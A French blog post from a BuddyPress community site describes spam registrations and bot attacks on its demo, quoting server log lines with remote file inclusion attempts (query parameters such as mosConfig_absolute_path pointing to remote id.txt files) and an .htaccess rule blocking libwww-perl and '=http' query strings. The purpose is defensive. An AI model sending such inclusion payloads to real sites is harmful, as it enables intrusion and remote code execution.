BuddyPress France

Le spammeur ne prend jamais de vacances ! Et pour cause, à part compter des shell* vide, il n’a rien à faire sur une plage le pôvre. (Cela dit, je vois mal un disque dur en train de siroter un mojito sur une terrasse à Ibiza…) Sur les 3 inscriptions de cette nuit, en voici 2 émanant de la même IP. Le journal de connexion du serveur a enregistré plusieurs activités pour cette IP. Vu le laps de temps écoulé (> 1/2h), je pense qu’il s’agit d’opérateurs manuels qui sévissent sporadiquement, tous les 2 – 3 jours. Ils s’inscrivent, ouvrent un blog une fois sur deux et c’est tout. Je me contente de les virer au jour le jour. Bannir les IP ne sert à rien, les bloquer au niveau du mail non plus. *coquilles

66.249.66.162 – - [12/Aug/2009:05:35:21 +0200] “GET /bpdemo/members/pedrodavid1970/profile HTTP/1.1″ 302 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
66.249.66.162 – - [12/Aug/2009:05:35:22 +0200] “GET /bpdemo/members/williamshields1973/profile HTTP/1.1″ 302 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

Plus silencieux, plus pernicieux et potentiellement plus dangereux, les attaques de bots avec ou sans enregistrement de membres, c’est selon. Environ une centaine par mois en ce qui concerne www.buddypress-fr.net

Je ne suis pas expert en la matière, mais j’ai tout de même lu la doc qui accompagne le plugin WP-SPamfree en service sur la démo depuis 2 mois. Ce faisant j’ai appris que l’on pouvait minimiser les risques d’attaques en bloquant depuis .htaccess une librairie du nom de libwww-perl, particulièrement utilisée par les garnements du hacks dominical. Ce user-agent se distingue en utilisant des URL d’accès pour le moins originales, comme vous pouvez le voir ci-dessous. Inutile de vous préciser que ces url sont bidons. Parfois même comiques, comme celle utilisant com_virtuemart qui est, si je ne m’abuse, un composant joomla. Bin voui, tout est bon pour essayer d’entrer sur un site WPMU: article, forum, fichier système, widget,… et composants Joom ! C’est trèèès con, non ? (source)

79.148.238.69 – - [09/Jul/2009:04:52:32 +0200] “GET /?_SERVER[DOCUMENT_ROOT]=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1″ 200 9385 “-” “libwww-perl/5.79″
69.10.155.111 – - [09/Jul/2009:17:49:04 +0200] “GET /index.php?buddy=installation//includes/header.php?c_temp_path=http://swoooper.com//config/b1ttletX1.txt??? HTTP/1.1″ 404 195 “-” “libwww-perl/5.79″
65.38.210.157 – - [09/Jul/2009:18:22:47 +0200] “GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1″ 404 357 “-” “libwww-perl/5.803″
66.244.236.248 – - [10/Aug/2009:17:21:00 +0200] “GET /bpdemo/forum/topic/ou-placer-la-t…de-bppicture-album/page/2/index2.php?mosConfig_absolute_path=http://webone.smartqms.co.uk//totorials/id.txt?? HTTP/1.1″ 200 3767 “-” “libwww-perl/5.805″
66.244.236.248 – - [10/Aug/2009:17:24:57 +0200] “GET /bpdemo/forum/index2.php?mosConfig_absolute_path=http://webone.smartqms.co.uk//totorials/id.txt?? HTTP/1.1″ 200 3669 “-” “libwww-perl/5.805″

Pour contourner cela, un peu, sans être la panacée non plus mais c’est mieux que rien, vous pouvez coller ce qui suit dans votre htaccess. Code fournit par www.hybrid6.com (voir source ci-dessus)

# Bloquer l’accès à libwww-perl et bloquer les URL incluant “=http:” pour réduire au maximum les attaques

RewriteCond %{HTTP_USER_AGENT} libwww [NC]
RewriteRule ^(.*)$ – [F,L]

RewriteCond %{REQUEST_URI} !(wp\-login\.php|\/wp\-admin\/) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ – [F,L]